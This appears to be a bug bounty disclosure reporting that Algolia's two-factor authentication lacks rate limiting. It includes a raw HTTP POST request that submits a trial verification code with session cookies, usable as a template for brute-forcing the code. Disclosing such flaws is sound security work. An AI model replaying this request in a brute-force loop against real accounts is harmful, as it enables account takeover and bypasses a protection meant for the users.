No rate-limit in Two factor Authentication leads to bypass using bruteforce attack

Hi, There is no rate limit set for Two factor authentication, which demand for code sent to mobile. This code can be bruteforced easily to bypass this. ``` POST /users/testqr HTTP/1.1 Host: www.algolia.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://www.algolia.com/users/displayqr Cookie: __cfduid=dbe6010b3183f275b85d61f6dbce0417a1459962341; _ga=GA1.2.1293083525.1459962367; PRUM_EPISODES=s=1459971091672&r=https%3A//www.algolia.com/users/displayqr; _session_id=c8f877144126b9e3142d158ce5fbadfb; kvcd=1459971056919; km_ai=20868; km_uq=; km_lv=x; visitor_id139121=7630498; __cid=2af41b1f-9f59-4c7e-a3ef-e0c43327b92f; km_ni=20868; _hjIncludedInSample=1; _gat=1; _dc_gtm_UA-32446386-9=1; km_vs=1; km_identity=f7975d47418f3d188a1ed45468bc2c7e; _gat_UA-32446386-9=1; km_aliased=true Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 168 utf8=%E2%9C%93&authenticity_token=twHnV25SUnlKr2rqoBCjEcZ5M749eY1aLiX8gL9f7NiR4PJreIlBlBtn3X6F6qi7Z1JBQOKNgFxFVKapX4lCdg%3D%3D&users%5Bgauth_token%5D=6700&commit=Verify ``` F83580